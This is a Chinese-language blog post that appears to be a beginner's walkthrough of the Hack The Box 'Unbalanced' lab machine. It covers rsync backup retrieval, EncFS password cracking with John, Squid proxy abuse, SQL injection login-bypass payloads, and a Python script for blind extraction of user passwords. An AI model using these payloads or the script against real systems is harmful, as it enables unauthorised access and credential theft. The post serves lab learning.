<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="HTB Unbalanced从靶场入门学渗透0x00 简要介绍Unbalanced算是自己HTB的第一个靶场，也是总共做过的第二个靶场，对于看了一大堆理论但是初步接触靶场的我，可能很多工具和指令都是第一次使用，所以可能文中涉及到的一些解释较多，技术水平比较菜，希望大佬轻喷 0x01 渗透环境靶机IP：10.10.10.200 攻击机（kali）ip：10.10.14.35 0x02 渗透信息获取常">
<meta property="og:type" content="article">
<meta property="og:title" content="buchiyexiao&#39;s blog">
<meta property="og:url" content="http://example.com/2020/12/04/Unbalanced_User_Own/index.html">
<meta property="og:site_name" content="buchiyexiao&#39;s blog">
<meta property="og:description" content="HTB Unbalanced从靶场入门学渗透0x00 简要介绍Unbalanced算是自己HTB的第一个靶场，也是总共做过的第二个靶场，对于看了一大堆理论但是初步接触靶场的我，可能很多工具和指令都是第一次使用，所以可能文中涉及到的一些解释较多，技术水平比较菜，希望大佬轻喷 0x01 渗透环境靶机IP：10.10.10.200 攻击机（kali）ip：10.10.14.35 0x02 渗透信息获取常">
<meta property="og:locale">
<meta property="og:image" content="http://example.com/2020/12/04/Unbalanced_User_Own/img/image-20201125103650527.png">
<meta property="og:image" content="http://example.com/2020/12/04/Unbalanced_User_Own/img/image-20201125104919187.png">
<meta property="og:image" content="http://example.com/2020/12/04/Unbalanced_User_Own/img/image-20201125105115644.png">
<meta property="og:image" content="http://example.com/2020/12/04/Unbalanced_User_Own/img/image-20201125105851807.png">
<meta property="og:image" content="http://example.com/2020/12/04/Unbalanced_User_Own/img/image-20201125110256762.png">
<meta property="og:image" content="http://example.com/2020/12/04/Unbalanced_User_Own/img/image-20201125110957553.png">
<meta property="og:image" content="http://example.com/2020/12/04/Unbalanced_User_Own/img/image-20201125111807986.png">
<meta property="og:image" content="http://example.com/2020/12/04/Unbalanced_User_Own/img/image-20201125112140058.png">
<meta property="og:image" content="http://example.com/2020/12/04/Unbalanced_User_Own/img/image-20201125214656452.png">
<meta property="og:image" content="http://example.com/2020/12/04/Unbalanced_User_Own/img/image-20201125215428817.png">
<meta property="og:image" content="http://example.com/2020/12/04/Unbalanced_User_Own/img/image-20201125215827666.png">
<meta property="og:image" content="http://example.com/2020/12/04/Unbalanced_User_Own/img/image-20201125220259581.png">
<meta property="article:published_time" content="2020-12-04T13:56:18.184Z">
<meta property="article:modified_time" content="2020-11-25T14:11:27.297Z">
<meta property="article:author" content="Buchiyexiao">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2020/12/04/Unbalanced_User_Own/img/image-20201125103650527.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://example.com/2020/12/04/Unbalanced_User_Own/"/>





  <title> | buchiyexiao's blog</title>
  








<meta name="generator" content="Hexo 5.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
    <a target="_blank" rel="noopener" href="https://github.com/buchiyexiao" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>
    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">buchiyexiao's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://example.com/2020/12/04/Unbalanced_User_Own/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/head.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="buchiyexiao's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline"></h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-12-04T21:56:18+08:00">
                2020-12-04
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="HTB-Unbalanced从靶场入门学渗透"><a href="#HTB-Unbalanced从靶场入门学渗透" class="headerlink" title="HTB Unbalanced从靶场入门学渗透"></a>HTB Unbalanced从靶场入门学渗透</h2><h4 id="0x00-简要介绍"><a href="#0x00-简要介绍" class="headerlink" title="0x00 简要介绍"></a>0x00 简要介绍</h4><p>Unbalanced算是自己HTB的第一个靶场，也是总共做过的第二个靶场，对于看了一大堆理论但是初步接触靶场的我，可能很多工具和指令都是第一次使用，所以可能文中涉及到的一些解释较多，技术水平比较菜，希望大佬轻喷</p>
<h4 id="0x01-渗透环境"><a href="#0x01-渗透环境" class="headerlink" title="0x01 渗透环境"></a>0x01 渗透环境</h4><p>靶机IP：10.10.10.200</p>
<p>攻击机（kali）ip：10.10.14.35</p>
<h4 id="0x02-渗透信息获取"><a href="#0x02-渗透信息获取" class="headerlink" title="0x02 渗透信息获取"></a>0x02 渗透信息获取</h4><p>常规操作，nmap或者masscan等渗透扫描工具对其端口扫描</p>
<p><img src="img/image-20201125103650527.png" alt="image-20201125103650527"></p>
<p>对端口进行简单分析，22端口ssh不赘述，873端口rsync是一款数据备份工具，3128端口squid-http是linux的代理</p>
<h4 id="0x03-漏洞利用"><a href="#0x03-漏洞利用" class="headerlink" title="0x03 漏洞利用"></a>0x03 漏洞利用</h4><p>从[stackoverflow](<a target="_blank" rel="noopener" href="https://stackoverflow.com/questions/60544821/how-to-fix-rsyncs-error-chdir-failed-error-on-a-mac">How to fix rsync’s @ERROR: chdir failed error on a Mac - Stack Overflow</a>)找到了一个rsync的姿势</p>
<p><img src="img/image-20201125104919187.png" alt="image-20201125104919187"></p>
<p>甭管是啥，但是这些东西肯定有用，先拷贝下来</p>
<blockquote>
<p>sudo -rdt rsync://10.10.10.200/conf_backups ./xx文件夹</p>
</blockquote>
<p><img src="img/image-20201125105115644.png" alt="image-20201125105115644"></p>
<p>发现都是一些加密的文件，而我们的目标就是找到加密算法，通过上面rsync的利用，可以看到存在EncFS的加密函数，因此我们可以猜测文件都是借助EncFs进行加密，因此我们需要进行解密</p>
<p>EncFs解密我找了感觉都没有用，最后发现Kali中自带的John工具可以解密也是挺吃惊的（Kali天下第一！，附上我找到的John工具源码，有需要的同学可以自行阅读<a target="_blank" rel="noopener" href="https://github.com/koboi137/john">koboi137/john: John the Ripper 1.9.0-jumbo-1+bleeding-47a8a9b98 2019-08-26 20:19:16 (github.com)</a></p>
<p><img src="img/image-20201125105851807.png" alt="image-20201125105851807"></p>
<p>然后借助john和大规模字典进行爆破</p>
<p><img src="img/image-20201125110256762.png" alt="image-20201125110256762"></p>
<p>可以爆破出密码为bubblegum，因为爆破时间较长，爆破完就关了所以忘记截图了……</p>
<p>利用得到的密码对文件进行解密</p>
<p><img src="img/image-20201125110957553.png" alt="image-20201125110957553"></p>
<p>然后可以借助一些正则匹配grep等工具寻找password和squid等相关信息</p>
<p><img src="img/image-20201125111807986.png" alt="image-20201125111807986"></p>
<p><img src="img/image-20201125112140058.png" alt="image-20201125112140058"></p>
<p>然后我们可以配置代理去访问intranet.unbalanced.htb，发现一个界面</p>
<p><img src="img/image-20201125214656452.png" alt="image-20201125214656452"></p>
<p><img src="img/image-20201125215428817.png" alt="image-20201125215428817"></p>
<p>由于上面我们知道了password，我们借助squidclient去查看FQDN缓存统计信息和内容，发现172.17.0.1为负载均衡器，172.31.172.2/3为两个web服务器，访问172.17.0.1发现回显主机停止负载平衡进行安全维护，但是我们刚才访问intranet.unbalanced.htb为intranet.php，大胆猜测，它仍可以运行，所以访问发现确实仍存在</p>
<p>进行简单的页面测试，然后没有发现什么漏洞，陷入僵局….</p>
<p>后来网上找到了一个大佬的文章，发现这里其实是存在SQL注入的，SQL语句为</p>
<blockquote>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="keyword">FROM</span> <span class="keyword">users</span> <span class="keyword">WHERE</span> Username=<span class="string">&#x27;$Username&#x27;</span> <span class="keyword">AND</span> <span class="keyword">Password</span>=<span class="string">&#x27;$Password&#x27;</span></span><br></pre></td></tr></table></figure>
</blockquote>
<p>然后注入方法为’or’=’or’</p>
<p>注入后语句为</p>
<blockquote>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="keyword">FROM</span> <span class="keyword">users</span> <span class="keyword">WHERE</span> Username=<span class="string">&#x27;&#x27;</span><span class="keyword">or</span><span class="string">&#x27;=&#x27;</span><span class="keyword">or</span><span class="string">&#x27;&#x27;</span> <span class="keyword">AND</span> <span class="keyword">Password</span>=<span class="string">&#x27;&#x27;</span><span class="keyword">or</span><span class="string">&#x27;=&#x27;</span><span class="keyword">or</span><span class="string">&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>
</blockquote>
<p><img src="img/image-20201125215827666.png" alt="image-20201125215827666"></p>
<p>然后大佬又告诉我如何在知道用户名的情况下得到用户的密码，大佬构造的SQL语句为以下：</p>
<blockquote>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="keyword">FROM</span> <span class="keyword">users</span> <span class="keyword">WHERE</span> Username=<span class="string">&#x27;&#x27;</span> <span class="keyword">AND</span> <span class="keyword">Password</span>=<span class="string">&#x27;&#x27;</span> <span class="keyword">OR</span> <span class="keyword">Password</span> <span class="keyword">LIKE</span> <span class="string">&#x27;a%&#x27;</span></span><br><span class="line"><span class="keyword">SELECT</span> <span class="keyword">FROM</span> <span class="keyword">users</span> <span class="keyword">WHERE</span> Username=<span class="string">&#x27;&#x27;</span> <span class="keyword">AND</span> <span class="keyword">Password</span>=<span class="string">&#x27;&#x27;</span> <span class="keyword">OR</span> <span class="keyword">substring</span>(<span class="keyword">Password</span>,<span class="number">1</span>,<span class="number">1</span>)=<span class="string">&#x27;a&#x27;</span></span><br></pre></td></tr></table></figure>
</blockquote>
<p>然后借助bs4和requests进行遍历得到users的密码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"><span class="keyword">from</span> bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">users = [<span class="string">&quot;rita&quot;</span>, <span class="string">&quot;jim&quot;</span>, <span class="string">&quot;bryan&quot;</span>, <span class="string">&quot;sarah&quot;</span>]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> user <span class="keyword">in</span> users:</span><br><span class="line">    print(<span class="string">f&quot;<span class="subst">&#123;user&#125;</span>: &quot;</span>, end=<span class="string">&quot;&quot;</span>, flush=<span class="literal">True</span>)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">31</span>):</span><br><span class="line">        <span class="keyword">for</span> c <span class="keyword">in</span> string.printable[:<span class="number">94</span>]:</span><br><span class="line">            print(c, end=<span class="string">&quot;&quot;</span>, flush=<span class="literal">True</span>)</span><br><span class="line">            r = requests.post(<span class="string">&quot;http://172.31.179.1/intranet.php&quot;</span>,</span><br><span class="line">                              data=&#123;<span class="string">&quot;Username&quot;</span>: <span class="string">&quot;nobody&quot;</span>,</span><br><span class="line">                                    <span class="string">&quot;Password&quot;</span>: <span class="string">f&quot;&#x27; or substring(Password,<span class="subst">&#123;i&#125;</span>,1)=&#x27;<span class="subst">&#123;c&#125;</span>&quot;</span>&#125;,</span><br><span class="line">                              proxies=&#123;<span class="string">&quot;http&quot;</span>: <span class="string">&quot;http://10.10.10.200:3128&quot;</span>&#125;)</span><br><span class="line">            soup = BeautifulSoup(r.text, <span class="string">&quot;html.parser&quot;</span>)</span><br><span class="line">            <span class="keyword">if</span> d := soup.find(<span class="string">&quot;div&quot;</span>, &#123;<span class="string">&quot;class&quot;</span>: <span class="string">&quot;m4&quot;</span>&#125;):</span><br><span class="line">                <span class="keyword">if</span> [p <span class="keyword">for</span> p <span class="keyword">in</span> d.find_all(<span class="string">&quot;p&quot;</span>, &#123;<span class="string">&quot;class&quot;</span>: <span class="string">&quot;w3-opacity&quot;</span>&#125;) <span class="keyword">if</span> p.text.strip() == user]:</span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line">            print(<span class="string">&quot;\b&quot;</span>, end=<span class="string">&quot;&quot;</span>, flush=<span class="literal">True</span>)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            print(<span class="string">&quot; &quot;</span>)</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p>这里可以得到用户的账号和密码，尝试每组账号密码进行SSH连接，发现bryan可以登陆成功，得到user权限</p>
<p><img src="img/image-20201125220259581.png" alt="image-20201125220259581"></p>
<h4 id="0x04-总结"><a href="#0x04-总结" class="headerlink" title="0x04 总结"></a>0x04 总结</h4><p>尝试后发现bryan仅仅只是user权限，所以并没有获得root权限，也尝试了弱口令和已有口令拼接爆破，但是均无果</p>
<p>查找了一些大佬的文章和视频，发现后面主要是利用了一个Pi-hole Gravity updater的安全漏洞构造了php的shellcode，具体利用见cve-2020-11108，这里由于我还没有仔细去看这个漏洞的位置和复现方法，所以不在多说</p>
<p>作为自己渗透的前几台靶机，因为刚接触所以可能还不太灵活，目前个人认为的大概思路就是nmap或者其他工具进行扫描端口，发现端口，如果存在80端口或者一些代理转发的端口大概率从web页面入手，而如果存在一些其它端口，可以直接百度搜索该端口的漏洞，初步尝试使用msf寻找相关的攻击方法，攻击不成可以借助kali上的一些工具包进行测试，而web页面上一般都会存在着一些奇怪姿势的SQL或者弱口令（目前对于提权还不太掌握，需要进一步学习</p>

      
    </div>
    
    
    

    
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/12/04/Academy_User_Own/" rel="next" title="Hack The Box Academy">
                <i class="fa fa-chevron-left"></i> Hack The Box Academy
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <a href="/">
              <img class="site-author-image" itemprop="image"
                src="/images/head.jpg"
                alt="" />
              </a>
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%7C%7C%20archive">
              
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#HTB-Unbalanced%E4%BB%8E%E9%9D%B6%E5%9C%BA%E5%85%A5%E9%97%A8%E5%AD%A6%E6%B8%97%E9%80%8F"><span class="nav-number">1.</span> <span class="nav-text">HTB Unbalanced从靶场入门学渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#0x00-%E7%AE%80%E8%A6%81%E4%BB%8B%E7%BB%8D"><span class="nav-number">1.0.1.</span> <span class="nav-text">0x00 简要介绍</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x01-%E6%B8%97%E9%80%8F%E7%8E%AF%E5%A2%83"><span class="nav-number">1.0.2.</span> <span class="nav-text">0x01 渗透环境</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x02-%E6%B8%97%E9%80%8F%E4%BF%A1%E6%81%AF%E8%8E%B7%E5%8F%96"><span class="nav-number">1.0.3.</span> <span class="nav-text">0x02 渗透信息获取</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x03-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">1.0.4.</span> <span class="nav-text">0x03 漏洞利用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x04-%E6%80%BB%E7%BB%93"><span class="nav-number">1.0.5.</span> <span class="nav-text">0x04 总结</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Buchiyexiao</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        
<div class="busuanzi-count">
  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
